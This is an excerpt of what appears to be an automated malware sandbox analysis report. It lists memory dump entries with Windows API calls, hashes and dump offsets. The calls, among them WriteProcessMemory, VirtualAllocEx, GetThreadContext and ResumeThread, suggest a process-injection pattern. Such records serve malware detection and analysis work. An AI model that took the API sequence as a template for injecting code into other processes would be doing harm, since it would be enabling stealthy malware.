                                                • Instruction ID: 42f49a86a07be39265bf35a774bc00042f3d6d002692af2abd7c4c19f35ec028
                                                • Opcode Fuzzy Hash: 2bdb954edb5e531e15680cd63f043d71794feee9695813facef77ead351e1b7f
                                                • Instruction Fuzzy Hash: 114114B1D04229CFEB14CFA9C9847DEBBF1BF48308F21846AD449AB251DB795946CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 01005421
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.814604796.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 58747c6648b217e9e644ed7405200a8d8e53459e4f408bfadb8129f6c150d564
                                                • Instruction ID: 0532e2105b98fc6bba3bde9c045b84afe17176fa929c28d42a1b3d4e3d1f765e
                                                • Opcode Fuzzy Hash: 58747c6648b217e9e644ed7405200a8d8e53459e4f408bfadb8129f6c150d564
                                                • Instruction Fuzzy Hash: 7F4104B0D04219CFEF24DFA9C8447CEBBB5BF48308F518069D549AB251DBB55946CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02B876B5
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.815091111.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 4f2bfa39c680ee0be302af2927958f84f6b5ea03cfbaf28159c6bc873f5c1990
                                                • Instruction ID: 2c424d6f7cf00e142ad8f0291164663b36affef62f65a491cd4f703335df0e4d
                                                • Opcode Fuzzy Hash: 4f2bfa39c680ee0be302af2927958f84f6b5ea03cfbaf28159c6bc873f5c1990
                                                • Instruction Fuzzy Hash: DA2125B5901249DFCB10CFAAD985BDEBBF4FB48324F14842AE918A3250D774A940CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0100B93E,?,?,?,?,?), ref: 0100B9FF
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.814604796.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 52c747508156df5081b8808929ae5d391ed7f83df9d083503e0409d000754be9
                                                • Instruction ID: 47e45c122e60baaf50b70f1530d7a4267739e8bdbde31de873ebb4cc2d80f999
                                                • Opcode Fuzzy Hash: 52c747508156df5081b8808929ae5d391ed7f83df9d083503e0409d000754be9
                                                • Instruction Fuzzy Hash: 4421E6B5900249EFDB10CFA9D584BDEBBF4EB48324F14841AE954B3350D374A954CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02B876B5
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.815091111.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 51bd5dd18772f38a3b78194daefb9ca3b6d147b6068cc38377ad05fbe46de2f4
                                                • Instruction ID: b66801852d8067799a4b7400dee6eb5b3f56c0ef8989cc67c77c4b8f9301b823
                                                • Opcode Fuzzy Hash: 51bd5dd18772f38a3b78194daefb9ca3b6d147b6068cc38377ad05fbe46de2f4
                                                • Instruction Fuzzy Hash: 182112B5900249DFCB10CF9AC984BDEFBF4FB48324F14842AE918A3250D778A944CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0100B93E,?,?,?,?,?), ref: 0100B9FF
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.814604796.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: bef4cef5aacbab5e86a68073771b58ed8a718264eeba057aa698ddb1c195d011
                                                • Instruction ID: 856d0311ad4257f66ffbfe53ed40439cb78454805431c4c874005666d138e4e0
                                                • Opcode Fuzzy Hash: bef4cef5aacbab5e86a68073771b58ed8a718264eeba057aa698ddb1c195d011
                                                • Instruction Fuzzy Hash: 6A21C4B5900249AFDB10CF99D984BDEBFF9EB48324F14841AE954B3350D374A954CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02B8752F
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.815091111.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: e6192f5a0be79db04164ef03b7731170b9ecf75c8237d46b3dd5806cd4613095
                                                • Instruction ID: 129da3c603e89712463158f0c51b7de6310224965b93693f4b363f9752216bea
                                                • Opcode Fuzzy Hash: e6192f5a0be79db04164ef03b7731170b9ecf75c8237d46b3dd5806cd4613095
                                                • Instruction Fuzzy Hash: C021E2B5900249DFCB10CF9AC884BDEFBF4FB48324F50842AE958A3250D374A954DFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetThreadContext.KERNELBASE(?,00000000), ref: 02B87467
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.815091111.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false
                                                Similarity
                                                • API ID: ContextThread
                                                • String ID:
                                                • API String ID: 1591575202-0
                                                • Opcode ID: 72d4b226e8bbdae79dde52987ac7301ab61fed72547a28267fd2e69aaf7f27fc
                                                • Instruction ID: 2b145c857e5043c3c89006e245598c7f876701ef3777da65b05fa8a8eec6e47b
                                                • Opcode Fuzzy Hash: 72d4b226e8bbdae79dde52987ac7301ab61fed72547a28267fd2e69aaf7f27fc
                                                • Instruction Fuzzy Hash: F6212971D0061A9FDB00CF9AC5457EEFBF4FB48214F54816AD418B3640D774A954CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02B8752F
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.815091111.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: f8eb217f15632f324e1c5cd96ec14bbfe166dedaca8dd7c938290d9be452605f
                                                • Instruction ID: 51897a213e39db106eeb8be985ca9b7dd371fce49b1e1f1461ad3d9e719f21f9
                                                • Opcode Fuzzy Hash: f8eb217f15632f324e1c5cd96ec14bbfe166dedaca8dd7c938290d9be452605f
                                                • Instruction Fuzzy Hash: 0E2102B59002499FCB10CF9AC884BDEFBF4FB48324F50842AE918A3210D378A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetThreadContext.KERNELBASE(?,00000000), ref: 02B87467
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.815091111.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false
                                                Similarity
                                                • API ID: ContextThread
                                                • String ID:
                                                • API String ID: 1591575202-0
                                                • Opcode ID: 9bf51cb7aced579cffe6a3fa9fa69891e2a4d749230a5a711d85fd521890c559
                                                • Instruction ID: 1a46840d01cb084fc0bc14d43fe3ad028c2ac04cd035b3c18b4163e614af0675
                                                • Opcode Fuzzy Hash: 9bf51cb7aced579cffe6a3fa9fa69891e2a4d749230a5a711d85fd521890c559
                                                • Instruction Fuzzy Hash: 342108B5D0065A9FDB00CF9AC5857DEFBF4FB48224F54816AD418B3240D778A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,010096E9,00000800,00000000,00000000), ref: 010098FA
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.814604796.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 38d7918c7b8bf17122bcc67e4293c635ce87812b2c8e335d57e0d0ab92dc2c9d
                                                • Instruction ID: 6af2c628bfaf51b502e68583b194155fe395f1b931a16b6841555d69779222b7
                                                • Opcode Fuzzy Hash: 38d7918c7b8bf17122bcc67e4293c635ce87812b2c8e335d57e0d0ab92dc2c9d
                                                • Instruction Fuzzy Hash: 6E1133B2D002499FEB10CF9AC444BDEBBF4EB48324F04842AE559A7240C374AA45CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: <l
                                                • API String ID: 0-1974440910
                                                • Opcode ID: 621704393bbc5cd432d816932b26971063fc0b6fff011bca18d8c279b7ae1d85
                                                • Instruction ID: 3e320e307c1d070022a42da76ff8062deccf1d09e64e00485dbf97af7b42fcc7
                                                • Opcode Fuzzy Hash: 621704393bbc5cd432d816932b26971063fc0b6fff011bca18d8c279b7ae1d85
                                                • Instruction Fuzzy Hash: FFC15C30B101189FCB55EF68D859AAEBBF6FF88614F558029E506E73A5CB30DC01DBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,02B89AA1,?,?), ref: 02B89C48
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.815091111.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false
                                                Similarity
                                                • API ID: ChangeCloseFindNotification
                                                • String ID:
                                                • API String ID: 2591292051-0
                                                • Opcode ID: 862b09f36bd72e64ad1df18653b8afaef3c800480a68cf5dd3fb0466be88decb
                                                • Instruction ID: 9a2f3269c0d7fc0d878c4d9f5ebf9f072bdb8c830a186605f445914e81340819
                                                • Opcode Fuzzy Hash: 862b09f36bd72e64ad1df18653b8afaef3c800480a68cf5dd3fb0466be88decb
                                                • Instruction Fuzzy Hash: A81166B1900609CFDB10CF99D544BEEBBF4EF48324F14846AD958A3300D339A949CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,010096E9,00000800,00000000,00000000), ref: 010098FA
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.814604796.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: d6f6c29f987a539ebee82167dec61b4718d0c48fdd0242db8746bc19f7e8609e
                                                • Instruction ID: 33cd4545c9362143e4c1f34ac240f6dc487d193fa93a80a12602d6882ee738c2
                                                • Opcode Fuzzy Hash: d6f6c29f987a539ebee82167dec61b4718d0c48fdd0242db8746bc19f7e8609e
                                                • Instruction Fuzzy Hash: 421112B6D00209DFEB10CF9AC544BEEBBF4AB48324F15842AD559B7251C375A645CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02B875EB
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.815091111.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 3a3179cea62656e2bc6ece8c4037a2a30649b270887ba61fb627d8b6579be5c2
                                                • Instruction ID: b72052ea1b7432df85da7cd492fbc3489e89d27c14ddfbbb7f093778eb5d5660
                                                • Opcode Fuzzy Hash: 3a3179cea62656e2bc6ece8c4037a2a30649b270887ba61fb627d8b6579be5c2
                                                • Instruction Fuzzy Hash: E31102B6900249DFCB10DF9AC884BDEBBF4FB48324F248469E528A7210C775A954CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,02B89AA1,?,?), ref: 02B89C48
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.815091111.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false
                                                Similarity
                                                • API ID: ChangeCloseFindNotification
                                                • String ID:
                                                • API String ID: 2591292051-0
                                                • Opcode ID: ead9ba0ae946a48260a0b6ad33c29d894678078be9411985eb65b6ca6dd35b0d
                                                • Instruction ID: fc2ecd96ec7cfe68255f27445b9ebb95a7d5fb22ed88a8238c85b40a6836d477
                                                • Opcode Fuzzy Hash: ead9ba0ae946a48260a0b6ad33c29d894678078be9411985eb65b6ca6dd35b0d
                                                • Instruction Fuzzy Hash: 291166B1800649CFDB10DF99C588BEEBBF4EB48324F10846AD559A7300D738A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,010096E9,00000800,00000000,00000000), ref: 010098FA
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.814604796.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 13fa42c8b4bdefb8cd3b0424213b35ed8024eb41c3967c8b6933acbad5aa5c0e
                                                • Instruction ID: 00b9bb6239e06286f1dfc0840178f9a9844b1e5d197c844aa53933b7268c3152
                                                • Opcode Fuzzy Hash: 13fa42c8b4bdefb8cd3b0424213b35ed8024eb41c3967c8b6933acbad5aa5c0e
                                                • Instruction Fuzzy Hash: 2F11ADB29003099FEB15CB9DD404BEABBF4EF84328F04846EE658A7251C376A544CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02B875EB
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.815091111.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 821264fc56dba8083779bdc1c8e8ef4a7f33e42a7743a7a386b81adac892563f
                                                • Instruction ID: fb5f24d9dbb15c3d23093b3a71357cacb502d6f1b5568f5a670fab296e04e982
                                                • Opcode Fuzzy Hash: 821264fc56dba8083779bdc1c8e8ef4a7f33e42a7743a7a386b81adac892563f
                                                • Instruction Fuzzy Hash: 7011E0B6900249DFCB10DF9AC884BDEBBF8FB48324F248459E529A7210C775A954CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0100966E
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.814604796.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 36a42c4684e2208045e66c40a98440428fd2f2c30a6e10c84186f44fe70917d3
                                                • Instruction ID: b4b74859b5c1c8a1c6811ca7e89bef0fb6b9faee9cf38eecea059cfc178790b1
                                                • Opcode Fuzzy Hash: 36a42c4684e2208045e66c40a98440428fd2f2c30a6e10c84186f44fe70917d3
                                                • Instruction Fuzzy Hash: BB1110B5C006498FEB10CF9AC844BDEFBF4AF88328F15852AD469B7210C378A545CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.815091111.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: ae13b18c1c8faac03df18c85ef4cc4cd7aadefb7f8e9e2e8d2373d8c873ee9d9
                                                • Instruction ID: dce6f9975fbe1d13ce0502efb436304b11dc527f87bbf176cc6ed7a4f7179590
                                                • Opcode Fuzzy Hash: ae13b18c1c8faac03df18c85ef4cc4cd7aadefb7f8e9e2e8d2373d8c873ee9d9
                                                • Instruction Fuzzy Hash: 0C1133B5800649DFDB10CF9AC884BEEFBF8EF49324F24846AD559A3200D774A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 02B88445
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.815091111.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 9d8cd8bce6874f2c7af90b6d39845031407ee39b97df2fe5ceadc69fccb0d741
                                                • Instruction ID: dee14c461d33f694672072ea300797582c74641013b93ef30c1063dbdb901dcb
                                                • Opcode Fuzzy Hash: 9d8cd8bce6874f2c7af90b6d39845031407ee39b97df2fe5ceadc69fccb0d741
                                                • Instruction Fuzzy Hash: AD1115B58003499FDB10CF9AD484BDEBBF8FB48324F14885AE958A7700C374A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 02B88445
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.815091111.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: c11785595e4efdab2e1baeaa7296fda51126b95c7b02acbbe079055cedb6b2de
                                                • Instruction ID: d29883d0890c8d2c6c8a4de4c17948208ae5fde951ad10116607146870deb8ca
                                                • Opcode Fuzzy Hash: c11785595e4efdab2e1baeaa7296fda51126b95c7b02acbbe079055cedb6b2de
                                                • Instruction Fuzzy Hash: 0E11E5B58003499FDB10DF99C984BDEBBF8EB48324F14845AE559A7600C374A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.815091111.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 728cd9c149385d08bb0f23f8f7b5c1503350798a9ba416ee029b0339694ad581
                                                • Instruction ID: 3f7d62a381cd6f5621e565b13ce5cc321fa88745ab5c5bdd828a71a99b5f4118
                                                • Opcode Fuzzy Hash: 728cd9c149385d08bb0f23f8f7b5c1503350798a9ba416ee029b0339694ad581
                                                • Instruction Fuzzy Hash: 3B1112B58002498FCB10DF9AC488BDEFBF8EB48328F20845AD519B3200C774A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.815091111.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 7ca01437839b56ec8f11e7505a48ee5f20fcc4d174b1db1bda0a6089d60d1ec3
                                                • Instruction ID: 9f0ea98609afeca043ecd004f9c2ec98a52f03f7a3abd5a97d8dc768ba8b3bbd
                                                • Opcode Fuzzy Hash: 7ca01437839b56ec8f11e7505a48ee5f20fcc4d174b1db1bda0a6089d60d1ec3
                                                • Instruction Fuzzy Hash: C1F0F0F6C083808FEB109BAAD4153E9FFF0EF55318F2481CAD14997550D779A148DB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: c%#2
                                                • API String ID: 0-1076831515
                                                • Opcode ID: df839f6ece7ae36d6967b06a43c43e4a28a8e95bbb53f676b4d0560be142a565
                                                • Instruction ID: 337a9905c41b5d158cddf5830ec6ddee0c64dce4d3706cf32b7e336a13f37eec
                                                • Opcode Fuzzy Hash: df839f6ece7ae36d6967b06a43c43e4a28a8e95bbb53f676b4d0560be142a565
                                                • Instruction Fuzzy Hash: D23103B4E04209DFCB84CFAAC5845AEBBF2EF88300F10946AD818A7315D7789A41CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: $,l
                                                • API String ID: 0-2860895947
                                                • Opcode ID: ca27f4a190ffa3d0ec6688d8a67bee911549311dc4a6d024bda022e122d8bf14
                                                • Instruction ID: 0e58c95958ec36f0d8c6fcb42bff3182567cf597c5e318c0c19b10fadb0330d4
                                                • Opcode Fuzzy Hash: ca27f4a190ffa3d0ec6688d8a67bee911549311dc4a6d024bda022e122d8bf14
                                                • Instruction Fuzzy Hash: DD3142B8E04248DFCB04EFA4E584AEDBBF1EF49304F2180AAD904A7361D7319A01CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: c%#2
                                                • API String ID: 0-1076831515
                                                • Opcode ID: 38c853ad0cf61b62bf7b19496e1500fb57c9df490e8e46f40a5936a6f48b7124
                                                • Instruction ID: b38c05f480fbeae2a0c7e77a804c4a0ba4aaa7947459363e81ffebafee6ba2e8
                                                • Opcode Fuzzy Hash: 38c853ad0cf61b62bf7b19496e1500fb57c9df490e8e46f40a5936a6f48b7124
                                                • Instruction Fuzzy Hash: 1231D4B4E04209DFCB84CFAAC5859AEFBF2FB88300F10956AD819A7715D7749A41CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ac78e6e87a77d7c3389b6af3b151fa19bbae209029ac54a61425f1b1d72dbaff
                                                • Instruction ID: 063a0c6acc5a14afe6a86896103a122755a344b7856832205605e18712d48c5f
                                                • Opcode Fuzzy Hash: ac78e6e87a77d7c3389b6af3b151fa19bbae209029ac54a61425f1b1d72dbaff
                                                • Instruction Fuzzy Hash: 0DC156387106108FCB58EF28D898A6977F6FF88B14B1645A9E506CB3B5DB71EC05CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e756e389e2d6914f278a799844c921eb784e71ebbdf4912aed5e36c77d10757c
                                                • Instruction ID: e8c5dbf9d7e0ff3292f01c702aa7cd1b27b4554d6980085bde6c2059ee56a79b
                                                • Opcode Fuzzy Hash: e756e389e2d6914f278a799844c921eb784e71ebbdf4912aed5e36c77d10757c
                                                • Instruction Fuzzy Hash: 62B1E275E00228DFDB64DFA8D984B9DBBF2BF49300F1080E9E549AB251DB309A85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1759cb5a9d4ca8df17e0d8d73d09a732373cdedac2bf325d4d45f7462ca417af
                                                • Instruction ID: 3773c7d0abe7c58ce83a39af06e2689f40ab452c8fa880280253f5a79a5226fc
                                                • Opcode Fuzzy Hash: 1759cb5a9d4ca8df17e0d8d73d09a732373cdedac2bf325d4d45f7462ca417af
                                                • Instruction Fuzzy Hash: A2910975A1020A9FCB61DF68C884ADEB7F2FF48310F148669E965E7250D734EA51CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 733e7a4bac6bd12ab109a5b69bfefcc2776d75722571f9f19296456195368e85
                                                • Instruction ID: 313b865b2a2bcb75305a42cb252f8dd4e555802ddaddf9d62677c4cad1d436a4
                                                • Opcode Fuzzy Hash: 733e7a4bac6bd12ab109a5b69bfefcc2776d75722571f9f19296456195368e85
                                                • Instruction Fuzzy Hash: 947114B0E1421ADFDB44DFAAD4859EEFBF2BF89300F14806AD564A7241D7349A41CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 108f73bbe7c31fbbedd2dee8c9bce7b33ebe1020ffd074dfd511933e0ca503e9
                                                • Instruction ID: 594514e39e02539c991b4c15ef4ae72bc94a665750d779c81863dbe26dfe404c
                                                • Opcode Fuzzy Hash: 108f73bbe7c31fbbedd2dee8c9bce7b33ebe1020ffd074dfd511933e0ca503e9
                                                • Instruction Fuzzy Hash: AB4104317053015FD769BB798425A2E62E7AFC5308B15483CC646CB789EF78EE02C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 85b5343d000ee4ec3748f27b96f362b272515b0d260bb86934b441f44cfe5de2
                                                • Instruction ID: 67ba083d9652e3958f516864ff86729dd831afa24562527563eb5db1fa426ac4
                                                • Opcode Fuzzy Hash: 85b5343d000ee4ec3748f27b96f362b272515b0d260bb86934b441f44cfe5de2
                                                • Instruction Fuzzy Hash: 4A412931B047448FCB16EB78C4145AEBBB6EFC6300F0541AAD589DB392DB74AD09C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 80acbf37acf191762d7333f2f7f3a0bc95036e5a8087c4c8f6b6f1c03b873e38
                                                • Instruction ID: 2726f3a138f23c14df2119df706e566402656b858a0fef6f7defe16a959fd8ab
                                                • Opcode Fuzzy Hash: 80acbf37acf191762d7333f2f7f3a0bc95036e5a8087c4c8f6b6f1c03b873e38
                                                • Instruction Fuzzy Hash: A7418B30B1011A9FCF55EF64E889AAE7BA6FFC4714F058029F80297294CB34DC52CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1681911e9b51e60bb7a32812ceda66a4ea03f1b9ff16516a1d5a6e1083a0a54b
                                                • Instruction ID: fa4947f344dc69305e9a9fdfcdbeabbbb4d46a3eafad28cadd249b52d53ed3aa
                                                • Opcode Fuzzy Hash: 1681911e9b51e60bb7a32812ceda66a4ea03f1b9ff16516a1d5a6e1083a0a54b
                                                • Instruction Fuzzy Hash: 344139B0E042189FCB44DFA9D8946AEFBF2FF88310F14C16AE458EB255D7349941CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0f5333cddca7bab4efb090ed6ba54c805b2dd2af41de6e10c0e80a3b91f99890
                                                • Instruction ID: d5fb7906a15b433e67daa05d497279dbe7e26b3ef93e24589b152484bc1400f4
                                                • Opcode Fuzzy Hash: 0f5333cddca7bab4efb090ed6ba54c805b2dd2af41de6e10c0e80a3b91f99890
                                                • Instruction Fuzzy Hash: A141E274E002189FDB18DFA5D895AEEBBB2FF89310F14802AE805BB364DB745841CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d1ef81b1b2509709df538e05f73e6567a1ac47f767fee6588279dfdd748f5bce
                                                • Instruction ID: 3b794be807c83778f848cd69de792e2680d5ef9b3315f2d622e1e529a083ca13
                                                • Opcode Fuzzy Hash: d1ef81b1b2509709df538e05f73e6567a1ac47f767fee6588279dfdd748f5bce
